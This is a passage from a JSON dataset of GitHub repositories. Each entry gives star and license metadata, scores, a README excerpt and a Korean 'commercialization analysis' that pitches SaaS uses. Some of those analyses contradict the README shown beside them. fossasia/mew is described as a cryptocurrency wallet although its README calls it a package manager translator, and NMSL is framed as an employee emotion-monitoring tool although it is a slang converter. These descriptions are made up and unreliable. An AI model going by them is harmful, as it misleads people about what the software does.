/>\n</p>\n\n如果需","composite_score":0.4016,"license_safety_tag":"unknown"},{"name":"fossasia/susi_linebot","github_url":"https://github.com/fossasia/susi_linebot","stars":12,"language":"JavaScript","license":"LGPL-2.1","abandonment_months":75,"description":"# fossasia/susi_linebot 상용화 분석\n\n## 왜 보물인가\n라인(LINE) 메신저에서 AI 챗봇을 쉽게 만들고 관리할 수 있는 도구라 중소 소매점이나 고객 상담팀이 추가 개발비 없이 자동 응답 시스템을 구축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: \"LINE 챗봇 빌더\" 구독형 서비스로, 사용자들이 코딩 없","readme_excerpt":"# Getting Started With Line SUSI AI Bot:\n\n[![Build Status](https://travis-ci.org/fossasia/susi_linebot.svg?branch=master)](https://travis-ci.org/fossasia/susi_linebot)  \n\nIf you want to add SUSI Line bot as a friend Scan this QR Code and if you want to integrate follow steps given below \n\n <img src=\"/docs/images/Barcode.PNG\" width=\"370\">  \n\nTo integrate SUSI&#39;s API with Line bot and you will need to have a line account first so that you can follow below procedure. You can download it from [LINE APP](https://play.google.com/store/apps/details?id=jp.naver.line.android&amp;hl=en).\n\n## Pre-requisites:\n\n   - Line app\n   - Github\n   - Heroku\n\n\n## Steps:\n\n1. Login/Sign up\n2. Create a LINE@ account with enabled Messaging API on [Line Business Center](https://business.line.me/en/)\n3. Configure your bot\n4. Develop your bot\n5. Deploy your bot\n\n## 1- Login/Sign up:\n\nIf you have Line account then move to next step else sign up for an account and make\n one. <img src=\"/docs/images/Sign_up.PNG\" wid","composite_score":0.4016,"license_safety_tag":"restricted"},{"name":"Exrick/xmall","github_url":"https://github.com/Exrick/xmall","stars":6,"language":"Java","license":"gpl-3.0","abandonment_months":42,"description":"# xmall 상용화 분석\n\n## 왜 보물인가\n작은 규모의 온라인 쇼핑몰을 직접 구축하고 운영할 수 있는 완성된 시스템으로, 상점 운영자들이 외부 플랫폼 수수료 없이 독립적으로 사업을 시작할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 소상공인을 위한 \"저렴한 쇼핑몰 구축 플랫폼\" - 월 구독료를 받고 사용자들이 자신의 쇼핑몰을","readme_excerpt":"# XMall\n[![AUR](https://img.shields.io/badge/GPL-v3-red)](https://github.com/Exrick/xmall/blob/master/License)\n[![](https://img.shields.io/badge/Author-Exrick-orange.svg)](http://blog.exrick.cn)\n[![](https://img.shields.io/badge/version-1.1-brightgreen)](https://github.com/Exrick/xmall)\n[![GitHub stars](https://img.shields.io/github/stars/Exrick/xmall.svg?style=social&label=Stars)](https://github.com/Exrick/xmall)\n[![GitHub forks](https://img.shields.io/github/forks/Exrick/xmall.svg?style=social&label=Fork)](https://github.com/Exrick/xmall)\n\n> 作者本科毕业设计项目 期待您的捐赠支持\n\n### [X系列项目宣传视频](https://www.bilibili.com/video/av23121122/)\n- 作者亲自制作 [点我观看](https://www.bilibili.com/video/av23121122/)\n\n### 项目已部署，在线Demo\n- 前台商城：http://xmall.exrick.cn/\n- 后台管理系统：http://xmadmin.exrick.cn/\n\n### 单体版获取\n- 单体XMall系统 非分布式 可跑在1g1核服务器上\n- 获取方式：进入商城 http://xmall.exrick.cn/ 登陆后随意测试支付商品 填写捐赠信息 支付成功后将自动发至您填写的邮箱\n\n### 前台页面为基于Vue的独立项目 请跳转至 [xmall-front](https://github.com/Exrick/xmall-front) 项目仓库查看\n\n### 作者其他项目推荐\n- [XPay个人免签收款","composite_score":0.4015,"license_safety_tag":"restricted"},{"name":"justdotJS/SimplePresence","github_url":"https://github.com/justdotJS/SimplePresence","stars":5,"language":"JavaScript","license":"GPL-2.0","abandonment_months":39,"description":"# SimplePresence 저장소 분석\n\n## 왜 보물인가\n사용자가 현재 하고 있는 활동 상태(예: 게임 중, 음악 청취 중)를 자동으로 감지해 다른 사람들에게 보여주는 작은 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **게이밍 플랫폼 내장 기능**: Discord 같은 게임 커뮤니티에서 친구들에게 \"지금 뭐 하는지\" 자동 표시\n2. **팀 협업 도구","readme_excerpt":"---\n\n[![Discord](https://img.shields.io/discord/268970339948691456.svg?style=flat-square&colorB=7289DA)](https://discord.gg/js)\n[![Twitter](https://img.shields.io/badge/twitter-003087.svg?style=flat-square)](https://twitter.com/justjs_dev)\n\n# Note\n**Support for the latest Discord versions may not be perfect and is still being worked on!**\n\n# SimplePresence\nSimplePresence is an Electron app for macOS, Windows, and Linux that allows users to easily set their Discord Rich Presence Status.\nIt has a config for default strings, which can then be changed through the app at any time.\n\n[![Example](example.png)]()\n\n## Main\nSimplePresence's main/normal usage is for a custom rich presence. It supports images, captions, timestamps, and regular text. Start off by [following the setup guide](https://github.com/justdotJS/SimplePresence/wiki/setup).\n\n## Services\nSimplePresence has support for many service integrations - get your currently playing song, video, or movie in your Rich Presence. We currentl","composite_score":0.4015,"license_safety_tag":"restricted"},{"name":"justmarkham/scikit-learn-videos","github_url":"https://github.com/justmarkham/scikit-learn-videos","stars":5,"language":"Jupyter Notebook","license":"unknown","abandonment_months":27,"description":"# scikit-learn-videos 분석 보고서\n\n## 왜 보물인가\n머신러닝(데이터 분석 자동화)을 배우려는 초보자들을 위한 영상 강좌 모음으로, 복잡한 기술을 쉽게 설명하는 교육 콘텐츠입니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 교육 플랫폼 SaaS**: 데이터 분석 강좌 구독 서비스로 월별 사용료 모델 운영\n2. **기업 내부 교육 도구**:","readme_excerpt":"# Introduction to Machine Learning with scikit-learn\n\nThis video series will teach you how to solve Machine Learning problems using Python's popular scikit-learn library. There are **10 video tutorials** totaling 4.5 hours, each with a corresponding **Jupyter notebook**.\n\nYou can [watch the entire series](https://www.youtube.com/playlist?list=PL5-da3qGB5ICeMbQuqbbCOQWcS6OYBr5A) on YouTube and [view all of the notebooks](http://nbviewer.jupyter.org/github/justmarkham/scikit-learn-videos/tree/master/) using nbviewer.\n\nThe series is also available as a [free online course](https://courses.dataschool.io/introduction-to-machine-learning-with-scikit-learn) that includes updated content, quizzes, and a certificate of completion.\n\n[![Watch the first tutorial video](images/youtube.png)](https://www.youtube.com/watch?v=elojMnjn4kk&list=PL5-da3qGB5ICeMbQuqbbCOQWcS6OYBr5A&index=1 \"Watch the first tutorial video\")\n\n**Note:** The notebooks in this repository have been updated to use Python 3.9.1 and","composite_score":0.4015,"license_safety_tag":"unknown"},{"name":"fossasia/knittingpattern","github_url":"https://github.com/fossasia/knittingpattern","stars":11,"language":"Python","license":"LGPL-3.0","abandonment_months":65,"description":"# Knitting Pattern 저장소 분석\n\n## 왜 보물인가\n손뜨개질 패턴을 디지털로 설계하고 공유할 수 있는 오픈소스 플랫폼으로, 전 세계 뜨개질 애호가들의 창작 활동을 효율화할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 뜨개질 패턴 설계 및 공유 플랫폼으로 구독 기반 클라우드 서비스 운영\n- **내부 업무 도구**: 수공","readme_excerpt":"Knitting Pattern Library\n===============\n\nThe knitting pattern library enables tailors, artisans and home knitters to use a common pattern for knitting machines and hand made knits.\n\n.. image:: https://travis-ci.org/fossasia/knittingpattern.svg\n   :target: https://travis-ci.org/fossasia/knittingpattern\n   :alt: Build Status\n   \n.. image:: https://ci.appveyor.com/api/projects/status/c1983ovsc8thlhvi?svg=true\n   :target: https://ci.appveyor.com/project/AllYarnsAreBeautiful/knittingpattern\n   :alt: AppVeyor CI build status (Windows)\n   \n.. image:: https://codeclimate.com/github/fossasia/knittingpattern/badges/gpa.svg\n   :target: https://codeclimate.com/github/fossasia/knittingpattern\n   :alt: Code Climate\n\n.. image:: https://codeclimate.com/github/fossasia/knittingpattern/badges/coverage.svg\n   :target: https://codeclimate.com/github/fossasia/knittingpattern/coverage\n   :alt: Test Coverage\n\n.. image:: https://codeclimate.com/github/fossasia/knittingpattern/badges/issue_count.svg\n   :targe","composite_score":0.4015,"license_safety_tag":"restricted"},{"name":"fossasia/mew","github_url":"https://github.com/fossasia/mew","stars":12,"language":"Python","license":"GPL-3.0","abandonment_months":66,"description":"# fossasia/mew 분석 보고서\n\n## 왜 보물인가\n암호화폐 지갑을 직접 관리할 수 있는 오픈소스 도구로, 중개인 없이 개인이 디지털 자산을 안전하게 보관하려는 사용자들에게 필수적인 솔루션입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 암호화폐 초보자를 위한 '쉬운 지갑 관리 웹서비스' - 월 구독료로 보안 업데이트와 고객 지원 제","readme_excerpt":"# Mew\n\npackage manager translator\n\n![alt text](https://github.com/fossasia/mew/blob/master/graphics/logo.png \"kind of a logo\")\n\n## Any package manager command on any distro\n\n## How to install\n\n   * clone `https://github.com/fossasia/mew.git`\n   * cd mew\n   * ./mew\n\nArch | pacman | Q | Qc | Qi | Ql | Qm | Qo | Qp | Qs | Qu | Rn | Rns | Rs | S | Sc/Scc | Si | Sii | Sl | Ss | Syu | Sw | Sy | U\n:--: | :--: | :--: | :--: | :--: | :--: | :--: | :--: | :--: | :--: | :--: | :--: | :--: | :--: | :--: | :--: | :--: | :--: | :--: | :--: | :--: | :--: | :--: | :--:\n**Debian / Ubuntu** | apt / apt-get | dpkg -l | changelog | dpkg -s / aptitude show| dpkg -L|aptitude purge '~o'| dpkg -S / dlocate| dpkg -I | aptitude search '~i(~n $name\\|~d $description)'| apt-get upgrade -> n| | | apt remove | apt install --reinstall |  apt autoclean/ apt clean |apt-cache show / aptitude show |apt-cache rdepends / aptitude search ~D$pattern|apt-cache dumpavail apt-cache dump (Cache only) apt-cache pkgnames |apt sear","composite_score":0.4014,"license_safety_tag":"restricted"},{"name":"mozilla/firefox-browser-architecture","github_url":"https://github.com/mozilla/firefox-browser-architecture","stars":5,"language":"CSS","license":"MPL-2.0","abandonment_months":87,"description":"# Mozilla Firefox 브라우저 아키텍처 분석\n\n## 왜 보물인가\nFirefox 브라우저의 핵심 구조를 공개한 자료로, 웹브라우저를 만들거나 개선하려는 기업들이 참고할 수 있는 설계 가이드입니다.\n\n## 어디에 쓸 수 있나\n- **브라우저 개발 SaaS**: 기업용 맞춤형 웹브라우저나 보안 강화 브라우저 개발 서비스\n- **내부 도구**: 소프트웨","readme_excerpt":"\n# Firefox Browser Architecture\n\n## Mission\n\nChange Mozilla. Investigate big technical challenges and produce engineering programs to address them.\n\n\n## Our Conclusions\n\nThis is a list of our findings that we're reasonably happy with so far.\n\n* [Documenting our output](text/0001-documenting-output.md) looks at how we’re going to communicate with the rest of Mozilla.\n* [Extracting Necko](text/0002-extracting-necko.md) considers whether it's feasible or worthwhile to extract Necko — Gecko's C++ networking library — for use as a standalone component.\n* [Problems with XUL](text/0003-problems-with-xul.md) aims to list the different kinds of problems that exist with XUL.\n* [XBL and Web Components](text/0004-xbl-web-components.md) compares some old Mozilla technology (XBL) with modern Web Components.\n* [Problems with XBL](text/0005-problems-with-xbl.md) aims to list the different kinds of problems that exist with XBL.\n* [Architecture Reviews](text/0006-architecture-review-process.md) are heal","composite_score":0.4014,"license_safety_tag":"unknown"},{"name":"gaowanliang/NMSL","github_url":"https://github.com/gaowanliang/NMSL","stars":5,"language":"HTML","license":"GPL-3.0","abandonment_months":79,"description":"# NMSL 저장소 분석\n\n## 왜 보물인가\n2019년 이후 업데이트가 없고 별 5개에 불과해 시장 검증이 부족하며, 프로젝트 설명이 없어 실제 가치를 판단하기 어렵습니다.\n\n## 어디에 쓸 수 있나\n- **내부 업무 도구**: 직원들의 감정 상태를 모니터링하고 조직 문화 개선에 활용\n- **API 판매**: 텍스트 분석이 필요한 다른 서비스에 API로 제","readme_excerpt":"# NMSL\r\n## 一个纯前端的抽象话(及相关亚文化)转换器——欢迎 Star ⭐\r\n![其实根本没有孙笑川，或者说人人都是孙笑川](https://cdn.jsdelivr.net/gh/gaowanliang/p/1.png)\r\n\r\n> 人人都说抽象话，无人识得李老八。\r\n\r\n本人**儒雅随和**，自然对于抽象话很感兴趣，于是制作了这个在线的转换工具,点击链接即可在线体验：https://chouxiang.ml/\r\n\r\n> **分清场合，适度玩梗，要有基本的社会道德，请勿过度滥用此梗或幸灾乐祸！**\r\n\r\n**抽象话**是指从孙笑川所属的抽象工作室流传出的词汇，而现在随着狗粉丝们不断造梗，也出现了一些新的词语。抽象话本来只反复出现在孙笑川微博的评论里面，但随着抽象文化的兴起，抽象话也随之在互联网上扩散，许多地方都有抽象话的影子。\r\n\r\n### 特点\r\n\r\n词库补全计划已提上日程，请耐心等待\r\n\r\n可以通过[这个文档进行词库补全](https://docs.qq.com/sheet/DQmlGU0lualVBUU5h) https://docs.qq.com/sheet/DQmlGU0lualVBUU5h\r\n\r\n接下来可能会结合腾讯云SCF实现Serverless版本，看具体需求了\r\n\r\n#### 词库\r\n本网页为纯前端制作，无后台服务器，大家可以在[src/data/emoji.json](https://github.com/gaowanliang/NMSL/blob/master/src/data/emoji.json)找到完整的抽象话对应表。\r\n\r\n**源词库提供者 https://github.com/THUzhangga/NMSL 非常感谢此词库的提供者 THUzhangga**\r\n\r\n本来是想做着玩玩，没想到大家这么喜欢，原词库作者找到我我才想起来没有加出处，在这里向原词库作者报以诚挚的歉意。\r\n\r\n当然此词库并不太全，我加入了一些新词，如国家地区旗帜，后缀修饰词语，爷，弟弟等\r\n\r\n而且原词库作者也提醒了我可以通过多端协作的方式来进行词库补全，这里也感谢原词库作者提供的想法。\r\n\r\n#### 词库贡献名单(排名按照名单贡献者先后顺序) [加入词库补全计划](https://docs.qq.com/sheet/DQmlGU0lualVBUU5h)","composite_score":0.4014,"license_safety_tag":"restricted"},{"name":"fossasia/kniteditor","github_url":"https://github.com/fossasia/kniteditor","stars":11,"language":"Inno Setup","license":"LGPL-3.0","abandonment_months":46,"description":"# Knit Editor 상용화 분석\n\n## 왜 보물인가\n손뜨개질 패턴을 디지털로 설계하고 공유할 수 있는 전문 도구로, 손뜨개질 취미 시장의 급성장과 함께 새로운 기술 수요를 충족시킵니다.\n\n## 어디에 쓸 수 있나\n1. **손뜨개질 패턴 설계 SaaS**: 아마추어와 전문가가 복잡한 패턴을 쉽게 만들고 판매하는 온라인 플랫폼\n2. **직물 제조업체 내부","readme_excerpt":"kniteditor\n==========\n\n.. image:: https://travis-ci.org/fossasia/kniteditor.svg\n   :target: https://travis-ci.org/fossasia/kniteditor\n   :alt: Build Status\n\n.. image:: https://ci.appveyor.com/api/projects/status/yildjtxp8an3vejx?svg=true\n   :target: https://ci.appveyor.com/project/AllYarnsAreBeautiful/kniteditor\n   :alt: AppVeyor CI build status (Windows)\n\n.. image:: https://codeclimate.com/github/fossasia/kniteditor/badges/gpa.svg\n   :target: https://codeclimate.com/github/fossasia/kniteditor\n   :alt: Code Climate\n\n.. image:: https://codeclimate.com/github/fossasia/kniteditor/badges/coverage.svg\n   :target: https://codeclimate.com/github/fossasia/kniteditor/coverage\n   :alt: Test Coverage\n\n.. image:: https://codeclimate.com/github/fossasia/kniteditor/badges/issue_count.svg\n   :target: https://codeclimate.com/github/fossasia/kniteditor\n   :alt: Issue Count\n\n.. image:: https://badge.fury.io/py/kniteditor.svg\n   :target: https://pypi.python.org/pypi/kniteditor\n   :alt: Python Package Ind","composite_score":0.4013,"license_safety_tag":"restricted"},{"name":"fossasia/susi_slackbot","github_url":"https://github.com/fossasia/susi_slackbot","stars":12,"language":"JavaScript","license":"LGPL-2.1","abandonment_months":97,"description":"# SUSI Slackbot 평가 분석\n\n## 왜 보물인가\n슬랙(직장 메신저 앱)에서 인공지능 어시스턴트를 바로 사용할 수 있어, 업무 중 빠르게 질문에 답변받을 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 기업용 슬랙 워크스페이스에 AI 봇 기능을 추가한 구독 서비스로 월별 요금 부과\n2. **내부 업무 도구**: 대기업","readme_excerpt":"# SUSI Slack Bot\n\n[![Build Status](https://travis-ci.org/fossasia/susi_slackbot.svg?branch=development)](https://travis-ci.org/fossasia/susi_slackbot)\n[![CircleCI](https://img.shields.io/circleci/project/fossasia/susi_slackbot.svg?maxAge=2592000?style=flat-square)](https://circleci.com/gh/fossasia/susi_slackbot)\n[![Code Climate](https://codeclimate.com/github/fossasia/susi_slackbot/badges/gpa.svg)](https://codeclimate.com/github/fossasia/susi_slackbot)\n[![Join the chat at https://gitter.im/fossasia/susi_server](https://badges.gitter.im/Join%20Chat.svg)](https://gitter.im/fossasia/susi_server)\n\nThis is SUSI bot for Slack platform. [Slack](https://www.slack.com/) is a messenger services. Users can interact with SUSI by adding the bot to their slack workspaces.\n\n![Susi Slack](docs/images/slack_screenshot.png \"Susi Slack\")\n\n#### How do I install AskSusi on Slack\n\nFor making your own Slack Bot for Susi, please check out the [Installation document](/docs/installations/INSTALLATION_SLACK.md).","composite_score":0.4013,"license_safety_tag":"restricted"},{"name":"yacy/yacy_grid_mcp","github_url":"https://github.com/yacy/yacy_grid_mcp","stars":11,"language":"Java","license":"LGPL-2.1","abandonment_months":42,"description":"# YaCy Grid MCP 상용화 분석\n\n## 왜 보물인가\n전 세계 인터넷 정보를 한 곳에서 검색할 수 있는 독립적인 검색 엔진 기반 기술로, 구글 같은 대형 검색사에 의존하지 않고도 웹 검색 서비스를 만들 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 기업용 내부 검색 도구 SaaS**\n대기업·병원·대학의 내부 문서만 검색하는 사설 검색 엔진을 월","readme_excerpt":"# YaCy Grid Component: Master Connect Program (MCP)\n[![Build Status](https://travis-ci.org/yacy/yacy_grid_mcp.svg?branch=master)](https://travis-ci.org/yacy/yacy_grid_mcp)\n\nThe YaCy Grid is the second-generation implementation of YaCy, a peer-to-peer search engine.\nA YaCy Grid installation consists of a set of micro-services which communicate with each other\nusing a common infrastructure for data persistence. The required storage functions of the YaCy Grid are:\n- An asset storage, basically a file sharing environment for YaCy components\n- A message system providing an Enterprise Integration Framework using a message-oriented middleware\n- A database system providing search-engine related retrieval functions.\n\nAll YaCy components are microservices which can be deployed i.e. using Docker or other application\nhosting methods which are provided as cloud services from many different providers. A YaCy grid will\nscale with the number of microservices that connect to a common broker.\nThat broke","composite_score":0.4013,"license_safety_tag":"restricted"},{"name":"fornaxai/receptivefield","github_url":"https://github.com/fornaxai/receptivefield","stars":13,"language":"Jupyter Notebook","license":"GPL-3.0","abandonment_months":78,"description":"# Receptive Field 분석 보고서\n\n## 왜 보물인가\n인공지능 이미지 분석 모델의 \"시야 범위\"를 계산해주는 도구로, AI 모델 개발자들이 정확한 성능 설계를 할 수 있게 돕습니다.\n\n## 어디에 쓸 수 있나\n\n1. **AI 모델 설계 SaaS**: 기업의 AI 팀이 웹에서 모델 구조를 입력하면 최적 시야 범위를 자동 제시하는 서비스\n2. **내","readme_excerpt":"<img src=\"img/demo_readme.jpg\" width=\"800\">\n\n# receptivefield\n\nGradient based receptive field estimation for Convolutional \nNeural Networks. **receptivefield** uses backpropagation of \nthe gradients from output of selected feature maps to the input image in order to\nestimate the size (width, height), stride and offset of resulting\nreceptive field. Numerical estimation of receptive field can be \nuseful when dealing with more complicated neural networks like\nResNet, Inception (see notebooks) where analytical approach of \ncomputing receptive fields cannot be used.\n\n[![Build Status](https://travis-ci.org/fornaxai/receptivefield.svg?branch=master)](https://travis-ci.org/fornaxai/receptivefield)\n\n# Installation & supported APIs\n\n* Requires: python (in version >= 3.6), numpy, matplotlib, pillow (check requirements.txt)\n* `pip install receptivefield>=0.5.0`\n    * tensorflow.keras>=2.0\n    * pytorch>=1.3.1\n\n* `pip install receptivefield==0.4.0`\n    * keras==2.1.6 \n    * tensorflow==1.8.0\n    * ","composite_score":0.4013,"license_safety_tag":"restricted"},{"name":"fossasia/Ember_Simple_Calculator","github_url":"https://github.com/fossasia/Ember_Simple_Calculator","stars":12,"language":"JavaScript","license":"LGPL-3.0","abandonment_months":42,"description":"# Ember Simple Calculator 상용화 분석\n\n## 왜 보물인가\n누구나 쉽게 사용할 수 있는 간단한 계산기로, 특별한 기술 없이도 기본적인 계산 기능이 필요한 모든 사람들을 대상으로 서비스할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **교육용 SaaS**: 학생들을 위한 온라인 학습 플랫폼에 내장하여 수학 문제 풀이를 보조하는 도구로 제","readme_excerpt":"# Emberjs Calculator\n> #### Task Name (GCI 2017) : Simple Calculator Web App Using Ember.js\n![emberjs](https://cdn0.icicletech.com/media/ember-logo.jpg)\n\n## Description :\n\nSome projects at **FOSSASIA** use **EmberJS**. Please learn about the Framework. :heart:\n\nThe objective of this task is to **create a simple calculator web app with minimal UI using emberjs framework** and get introduced to it. The calculator should be able to perform the basic operations like addition, subtraction, multiplication and division. *Additional features like calculation square root, factorial, sin, cos would be great.*\n\n![Screenshot](https://github.com/niteshkumarniranjan/Ember_Simple_Calculator/raw/master/niteshkumarniranjan/embercalculator/Screenshot.png \"Screenshot\")\n\n\n\n\n","composite_score":0.4013,"license_safety_tag":"restricted"},{"name":"google/WebFundamentals","github_url":"https://github.com/google/WebFundamentals","stars":9,"language":"JavaScript","license":"apache-2.0","abandonment_months":46,"description":"# google/WebFundamentals 분석\n\n## 왜 보물인가\n구글이 직접 만든 웹 개발 교육 자료로, 초보자부터 전문가까지 웹사이트를 올바르게 만드는 방법을 배울 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 교육 플랫폼**: 웹 디자인 기초를 배우려는 사람들을 위한 유료 강의 콘텐츠로 활용\n2. **기업 교육 도구**: IT 회사들이 ","readme_excerpt":"# Web Fundamentals on DevSite\n\n**This repo has been archived and is not accepting any new issues or pull requests.**\n\nAll of the content from [developers.google.com/web/][dgc] has been moved to\n[web.dev](https://web.dev) or [developer.chrome.com](https://developer.chrome.com).\n\nThe source for [developers.google.com/web/][dgc] is now in `google3`. Changes\nmade here will not be published on DevSite.\n\n[dgc]: https://developers.google.com/web/\n","composite_score":0.4013,"license_safety_tag":"safe"},{"name":"facebook/Docusaurus","github_url":"https://github.com/facebook/Docusaurus","stars":13,"language":"TypeScript","license":"MIT","abandonment_months":0,"description":"# Docusaurus 저장소 분석\n\n## 왜 보물인가\n웹사이트나 블로그를 쉽게 만들 수 있는 기술로, 회사나 프로젝트 소개 페이지가 필요한 모든 조직이 사용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 기술 회사들이 제품 설명서와 튜토리얼을 담은 공식 문서 사이트 구축\n- **내부 업무 도구**: 대기업의 직원들이 회사 정책·절","readme_excerpt":"<div align=\"center\">\n  <h1 align=\"center\">\n    Docusaurus\n    <br />\n    <br />\n    <a href=\"https://docusaurus.io\">\n      <img src=\"https://docusaurus.io/img/slash-introducing.svg\" alt=\"Docusaurus\">\n    </a>\n  </h1>\n</div>\n\n<p align=\"center\">\n  <a href=\"https://x.com/docusaurus\"><img src=\"https://img.shields.io/twitter/follow/docusaurus.svg?style=social\" align=\"right\" alt=\"Twitter Follow\" /></a>\n  <a href=\"#backers\" alt=\"sponsors on Open Collective\"><img src=\"https://opencollective.com/Docusaurus/backers/badge.svg\" /></a>\n  <a href=\"#sponsors\" alt=\"Sponsors on Open Collective\"><img src=\"https://opencollective.com/Docusaurus/sponsors/badge.svg\" /></a>\n  <a href=\"https://www.npmjs.com/package/@docusaurus/core\"><img src=\"https://img.shields.io/npm/v/@docusaurus/core.svg?style=flat\" alt=\"npm version\"></a>\n  <a href=\"https://github.com/facebook/docusaurus/actions/workflows/tests.yml\"><img src=\"https://github.com/facebook/docusaurus/actions/workflows/tests.yml/badge.svg\" alt=\"GitHub Actions","composite_score":0.4012,"license_safety_tag":"safe"},{"name":"PatilShreyas/MaterialNavigationView-Android","github_url":"https://github.com/PatilShreyas/MaterialNavigationView-Android","stars":5,"language":"Kotlin","license":"GPL-3.0","abandonment_months":41,"description":"# MaterialNavigationView-Android 분석\n\n## 왜 보물인가\n스마트폰 앱에서 화면 하단의 메뉴 버튼을 더 예쁘고 사용하기 쉽게 만드는 기술입니다.\n\n## 어디에 쓸 수 있나\n\n1. **모바일 앱 개발 SaaS**: 앱 개발자들이 구독해서 이 메뉴 기능을 자신의 앱에 빠르게 적용할 수 있는 클라우드 서비스\n2. **스타트업 내부 업무 ","readme_excerpt":"## Archived ⚠️\n\nIdeally there is no need to use this library when [Material 2](https://m2.material.io/components/navigation-drawer/android#anatomy) and [Material 3](https://github.com/material-components/material-components-android/blob/master/docs/components/NavigationDrawer.md#anatomy) is already there which support better design than what this library provides.\n\n# Material NavigationView for Android 📱\n\n📱 Android Library to implement Rich, Beautiful Material Navigation View for your project with Material Design Guidelines. Easy to use.\n\n![](Images/GitHub.png)\n\n\n# Table of Contents:\n> - [ Introduction ](#introduction)\n> - [ Requirements ](#requirements)\n> - [ Implementation ](#implementation)\n>    - [ Prerequisite ](#prerequisite)\n>    - [ Create `Activity.xml` ](#createActivityXML)\n>    - [ Create Activity File](#createActivityCode)\n>  \n> - [ Migrating from `NavigationView` ](#migrate)\n> - [ Fast Implementation ](#fastImplementation)\n> - [ Contribute ](#contribute)    \n> - [ Credits ","composite_score":0.4012,"license_safety_tag":"restricted"},{"name":"fossasia/CommonsNet","github_url":"https://github.com/fossasia/CommonsNet","stars":12,"language":"JavaScript","license":"GPL-3.0","abandonment_months":93,"description":"# CommonsNet 보물 분석\n\n## 왜 보물인가\n지역 공동체가 인터넷 네트워크를 직접 구축하고 관리할 수 있도록 돕는 오픈소스 플랫폼으로, 통신 인프라 접근성이 낮은 지역의 디지털 격차 해소에 기여할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **시골 지역 인터넷 구축 서비스**: 지자체나 마을 공동체가 저비용으로 지역 네트워크를 구축하는 SaaS","readme_excerpt":"# CommonsNet\n\n[![Join the chat at https://gitter.im/fossasia/CommonsNet](https://badges.gitter.im/fossasia/CommonsNet.svg)](https://gitter.im/fossasia/CommonsNet?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge)\n[![Build Status](https://travis-ci.org/fossasia/CommonsNet.svg)](https://travis-ci.org/fossasia/CommonsNet)\n[![Issue Count](https://codeclimate.com/github/fossasia/CommonsNet/badges/gpa.svg)](https://codeclimate.com/github/fossasia/CommonsNet)\n[![Issue Count](https://codeclimate.com/github/fossasia/CommonsNet/badges/issue_count.svg)](https://codeclimate.com/github/fossasia/CommonsNet)\n[![Codacy Badge](https://api.codacy.com/project/badge/Grade/bbe4d39d3d164b598f9a988b5b835cb4)](https://www.codacy.com/app/ag-e-wisniewska/CommonsNet?utm_source=github.com&amp;utm_medium=referral&amp;utm_content=fossasia/CommonsNet&amp;utm_campaign=Badge_Grade)\n[![codecov](https://codecov.io/gh/fossasia/CommonsNet/branch/master/graph/badge.svg)](https://codecov.io/gh/fossas","composite_score":0.4012,"license_safety_tag":"restricted"},{"name":"aspnet/AspNetCore","github_url":"https://github.com/aspnet/AspNetCore","stars":9,"language":"C#","license":"apache-2.0","abandonment_months":0,"description":"","readme_excerpt":"ASP.NET Core\n============\n\n[![.NET Foundation](https://img.shields.io/badge/.NET%20Foundation-blueviolet.svg)](https://www.dotnetfoundation.org/)\n[![MIT License](https://img.shields.io/github/license/dotnet/aspnetcore?color=%230b0&style=flat-square)](https://github.com/dotnet/aspnetcore/blob/main/LICENSE.txt) [![Help Wanted](https://img.shields.io/github/issues/dotnet/aspnetcore/help%20wanted?color=%232EA043&label=help%20wanted&style=flat-square)](https://github.com/dotnet/aspnetcore/issues?q=is%3Aissue+is%3Aopen+label%3A%22help+wanted%22) [![Good First Issues](https://img.shields.io/github/issues/dotnet/aspnetcore/good%20first%20issue?color=%23512BD4&label=good%20first%20issue&style=flat-square)](https://github.com/dotnet/aspnetcore/issues?q=is%3Aissue+is%3Aopen+label%3A%22good+first+issue%22)\n[![Discord](https://img.shields.io/discord/732297728826277939?style=flat-square&label=Discord&logo=discord&logoColor=white&color=7289DA)](https://aka.ms/dotnet-discord)\n\nASP.NET Core is an open-","composite_score":0.4012,"license_safety_tag":"safe"},{"name":"reactjs/redux","github_url":"https://github.com/reactjs/redux","stars":25,"language":"TypeScript","license":"MIT","abandonment_months":0,"description":"# Redux 저장소 분석\n\n## 왜 보물인가\n웹사이트의 복잡한 데이터 상태를 간단하고 체계적으로 관리해주는 도구로, 대규모 프로젝트에서 개발 생산성을 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 대시보드형 웹 애플리케이션(프로젝트 관리, CRM 등)에서 사용자 데이터와 설정을 안정적으로 관리\n2. **내부 업무 도구","readme_excerpt":"# <a href='https://redux.js.org'><img src='https://avatars.githubusercontent.com/u/13142323?s=200&v=4' height='60' alt='Redux Logo' aria-label='redux.js.org' style=\"display: flex;align-items: center;\"/>Redux</a>\n\nRedux is a JS library for predictable and maintainable global state management.\n\nIt helps you write applications that behave consistently, run in different environments (client, server, and native), and are easy to test. On top of that, it provides a great developer experience, such as [live code editing combined with a time traveling debugger](https://github.com/reduxjs/redux-devtools).\n\nYou can use Redux together with [React](https://react.dev), or with any other view library. The Redux core is tiny (2kB, including dependencies), and has a rich ecosystem of addons.\n\n[**Redux Toolkit**](https://redux-toolkit.js.org) is our official recommended approach for writing Redux logic. It wraps around the Redux core, and contains packages and functions that we think are essential for ","composite_score":0.4012,"license_safety_tag":"safe"},{"name":"fossasia/susi_kikbot","github_url":"https://github.com/fossasia/susi_kikbot","stars":12,"language":"JavaScript","license":"LGPL-2.1","abandonment_months":97,"description":"# fossasia/susi_kikbot 평가 보고서\n\n## 왜 보물인가\n오픈소스 AI 챗봇 기술을 활용해 누구나 자신의 대화형 서비스를 쉽게 만들 수 있는 기초 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 소규모 기업용 고객 상담 챗봇 플랫폼으로 월 구독 모델 